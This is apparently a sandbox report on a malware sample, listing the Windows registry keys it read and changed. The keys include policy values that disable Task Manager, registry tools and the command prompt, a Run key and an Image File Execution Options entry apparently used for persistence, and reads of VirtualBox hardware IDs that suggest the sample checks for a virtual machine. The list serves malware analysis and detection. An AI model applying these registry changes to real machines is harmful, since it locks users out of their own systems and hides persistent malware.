HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LicenseInfo\FilePrint HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\D6v.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\986264BB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#5&106af171&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ServiceParameters HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LoadUserSettings HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20\Class HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0001\Driver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eHeadphoneWave\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default) 